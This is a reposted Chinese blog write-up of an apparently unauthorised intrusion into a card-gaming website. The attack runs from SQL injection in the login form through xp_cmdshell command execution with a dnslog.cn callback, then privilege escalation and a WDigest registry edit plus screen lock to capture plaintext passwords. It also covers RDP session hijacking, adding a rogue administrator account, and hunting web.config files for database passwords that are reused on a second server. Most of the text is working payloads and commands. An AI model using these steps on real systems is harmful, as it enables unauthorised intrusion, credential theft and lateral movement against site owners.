前言:
前几天无意看到了某个师傅的博客,就看到了某棋牌站点的sql注入,于是花了几分钟打了一下,也就当第一次打这种站点,过程非常简单,最后也是获取到了数据库密码,网站后台密码。
sql注入:
该站点如果有师傅打过,肯定有感觉的。
登录框这里存在sql注入,sqlmap跑一下。
但是这里只是一个延时注入,是dba权限
这里就不执行os-shell了,太慢了,直接利用xp_cmdshell执行命令
xp_cmdshell上线:
开启xp_cmdshell:
admin';EXEC sp_configure 'show advanced options',1;RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;--执行命令判断出网:
admin';exec master..xp_cmdshell 'ping dnslog.cn' --&password=123
就直接上线就行了:
这里如果用powershell一句话上线要注意转义,我最开始是执行下载木马命令然后在上线的,发现不能执行,因为权限比较低。
就是一个server权限,最后执行powershell语句上线的
内网渗透:
提权:
权限比较低,烂土豆一把梭
抓密码:
接着抓密码,显然是抓不到明文的,
这里简单讲一下常用的方法来获取管理员桌面:
RDP劫持:
这里我最开始想的是rdp劫持登录administrator的,发现管理员不在线
shell quser
如果管理员在线,利用sysytem执行:
tscon ID然后接可以获取到管理员桌面了。
修改注册表:
这里我们可以修改注册表,然后进行锁屏,这样管理员在登陆的时候就可以抓到明文密码了:
##修改注册表:
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
锁屏主机:
rundll32.exe user32.dll,LockWorkStation这里由于管理员不在线,所以就不演示了,可以本地复现一遍。
RDP hash传递:
这个方法我一直没有成功过,本地复现也失败,这里有兴趣的师傅可以自行了解一下。
克隆用户:
在这里的话我直接创建一个用户,然后克隆一个administrator账号:
shell net user xxxx 123!@#qw /add
shell net localgroup administrators xxxx /add利用xxxx账户登陆进去克隆administrator账户
在重新登陆就能看到administrator桌面了
翻密码:
看到了mssql数据库正在运行:
开始寻找数据库账号密码,因为网站是asp的,所以直接找web.config文件:
dir C:,D: /b /s | find web.config""收获挺大,翻到了两条数据库密码:
第一个是这个服务器的,第二个是另一个服务器的
这里就简单验证一下密码是否正确。
mssqlclient.exe "sa:password"@ip1
mssqlclient.exe "sa:password"@ip2
后台登录:
在本地数据库找到了网站账号和加密后的密码,丢到md5解密:
这尼玛,直接123456
登陆后台
靠,这个流量开个毛线呀。
原文始发于微信公众号(乌雲安全):实战|某棋牌站点的简单渗透
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论